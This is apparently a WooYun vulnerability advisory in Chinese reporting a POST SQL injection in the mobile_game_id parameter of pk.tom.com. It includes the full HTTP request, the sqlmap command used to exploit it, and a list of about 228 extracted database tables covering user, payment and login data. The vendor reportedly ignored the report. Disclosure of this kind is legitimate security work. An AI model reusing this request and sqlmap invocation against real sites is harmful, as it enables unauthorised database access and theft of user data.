当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118977

漏洞标题:Tom在线某站SQL注射涉及40w用户

相关厂商:TOM在线

漏洞作者: 路人甲

提交时间:2015-06-09 10:29

修复时间:2015-06-14 10:30

公开时间:2015-06-14 10:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

tom自己说的40万啊

详细说明:

1.png


POST /web/download_page.jsp?source=HP_mobilegame_bybsb&from=00403&class=and&q_id=99 HTTP/1.1
Host: pk.tom.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=abc1jamRVmxlb9eZvF82u
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
mobile_game_id=12777


sqlmap.py -r test.txt -p mobile_game_id --dbms mysql
post注入

Database: newwapdb
[228 tables]
+---------------------------------------+
| back_download_game_info |
| bind_tom_139 |
| download_count |
| filter_words |
| game_bulletin |
| game_clientinfo |
| game_cogameinfo |
| game_coinfo |
| game_goods |
| game_goods_type |
| game_mission |
| game_netbattle |
| game_netbattle_item |
| game_photo |
| game_single_record |
| game_stat_day |
| game_toolsinfo |
| game_uids |
| game_user |
| game_user_black |
| game_user_chat |
| game_user_friend |
| game_user_level |
| game_user_sign |
| game_user_sns |
| game_user_task |
| game_user_visitor |
| game_useraddressinfo |
| game_usergold |
| game_usergolddetail |
| game_usergoods |
| game_userinfo |
| game_usermdoupmsg |
| game_userpay_offerclient |
| game_userpayrecord |
| game_userprize |
| game_userrandom |
| game_userrandom_bak |
| game_userrandom_new |
| game_userrechargerecord |
| game_v2_netbattle |
| game_v2_netbattle_finalgoldinfo |
| game_v3_bulletin |
| game_v3_friends |
| game_v3_linkmobile |
| game_v3_netbattle |
| game_v3_netbattle_finalgoldinfo |
| game_v3_netbattle_item |
| game_v3_pksparameter |
| game_v3_prizes |
| game_v3_sendsmsinfo |
| game_v3_single_record |
| game_v3_usergold |
| game_v3_usergolddetail |
| game_v3_userinfo |
| game_v3_userprize |
| game_v4_adv_record |
| game_v4_bulletin |
| game_v4_bulletin_wap |
| game_v4_cmddisc_history |
| game_v4_coupon_history |
| game_v4_couponprize_info |
| game_v4_fgrechargeprize_history |
| game_v4_finalgold_rechargeinfo |
| game_v4_friends |
| game_v4_gamedown_config |
| game_v4_gametype_info |
| game_v4_linkmobile |
| game_v4_lucklydraw_history |
| game_v4_manualprize |
| game_v4_manualprize_info |
| game_v4_message |
| game_v4_message_bak20120420 |
| game_v4_message_bak20120501 |
| game_v4_message_bak20120604 |
| game_v4_message_location |
| game_v4_message_location_bak20120420 |
| game_v4_message_location_bak20120501 |
| game_v4_message_location_bak20120604 |
| game_v4_message_location_new |
| game_v4_message_new |
| game_v4_mobileuid_linkinfo |
| game_v4_msgpush_info |
| game_v4_msgpush_type |
| game_v4_netbattle |
| game_v4_netbattle_bak20120420 |
| game_v4_netbattle_finalgoldinfo |
| game_v4_netbattle_item |
| game_v4_netbattle_item_bak20120420 |
| game_v4_onlinegame_info |
| game_v4_onlinegame_itempayment |
| game_v4_onlinegame_smscode |
| game_v4_payment_platform_detail |
| game_v4_pksparameter |
| game_v4_prizes |
| game_v4_robot_sendsmscount |
| game_v4_robotinfo |
| game_v4_sendsmsinfo |
| game_v4_single_record |
| game_v4_thirdpart_cardinfo |
| game_v4_thirdpart_partnerinfo |
| game_v4_thirdpart_usercard |
| game_v4_topboard |
| game_v4_user_freegold |
| game_v4_user_freegold_monthly |
| game_v4_user_freegolddetail |
| game_v4_user_prizeinfo |
| game_v4_userbattle_summarizinfo |
| game_v4_usercoupon_info |
| game_v4_usergold |
| game_v4_usergolddetail |
| game_v4_userinfo |
| game_v4_userinfo_extend |
| game_v4_userlogin |


该有的表都有了

漏洞证明:

QQ图片20150606153011.png


QQ图片20150605161728.png


QQ图片20150608090704.png


QQ图片20150608090759.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-14 10:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无